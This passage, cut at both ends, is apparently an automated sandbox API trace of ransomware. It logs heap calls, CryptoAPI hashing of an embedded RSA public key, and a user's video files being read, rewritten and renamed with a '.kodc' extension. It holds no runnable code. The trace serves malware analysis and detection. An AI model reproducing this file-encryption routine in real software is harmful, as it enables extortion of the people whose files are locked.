dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c100 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ab8 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c148 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ad0 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b00 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b18 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.954] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.954] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b00 | out: hHeap=0x630000) returned 1 [0099.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b18 | out: hHeap=0x630000) returned 1 [0099.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.955] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b18 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7b00 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.955] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.956] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7e47, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.956] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.956] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.956] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.956] CloseHandle (hObject=0x5cc) returned 1 [0099.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.969] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\67YJ.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\67yj.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\67YJ.mkv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\67yj.mkv.kodc")) returned 1 [0099.970] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1b81380, ftCreationTime.dwHighDateTime=0x1d5bf4a, ftLastAccessTime.dwLowDateTime=0x51fa3850, ftLastAccessTime.dwHighDateTime=0x1d5bdb9, ftLastWriteTime.dwLowDateTime=0x51fa3850, ftLastWriteTime.dwHighDateTime=0x1d5bdb9, nFileSizeHigh=0x0, nFileSizeLow=0x2dfd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6dK25uRTDl.swf", cAlternateFileName="6DK25U~1.SWF")) returned 1 [0099.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.970] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.970] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6dK25uRTDl.swf") returned=".swf" [0099.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\6dK25uRTDl.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\6dk25urtdl.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.971] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=11773) returned 1 [0099.971] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.975] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x2dd7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.975] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.976] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.976] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x2dfd, lpOverlapped=0x0) returned 1 [0099.976] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.976] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.976] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.976] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.977] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.977] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.977] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.977] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.977] GetLastError () returned 0x0 [0099.977] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.978] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.978] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.978] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.978] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2e00) returned 0x9ba6d90 [0099.978] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c148 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ad0 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c190 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ae8 [0099.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b18 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b30 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.979] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b18 | out: hHeap=0x630000) returned 1 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b30 | out: hHeap=0x630000) returned 1 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b30 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7b18 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b30 | out: hHeap=0x630000) returned 1 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b18 | out: hHeap=0x630000) returned 1 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.980] GetCurrentThreadId () returned 0x42c [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba61e8 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.980] GetCurrentThreadId () returned 0x42c [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b18 [0099.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b30 [0099.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b00 [0099.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7b48 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b18 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7b18 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b18 | out: hHeap=0x630000) returned 1 [0099.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7b48 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 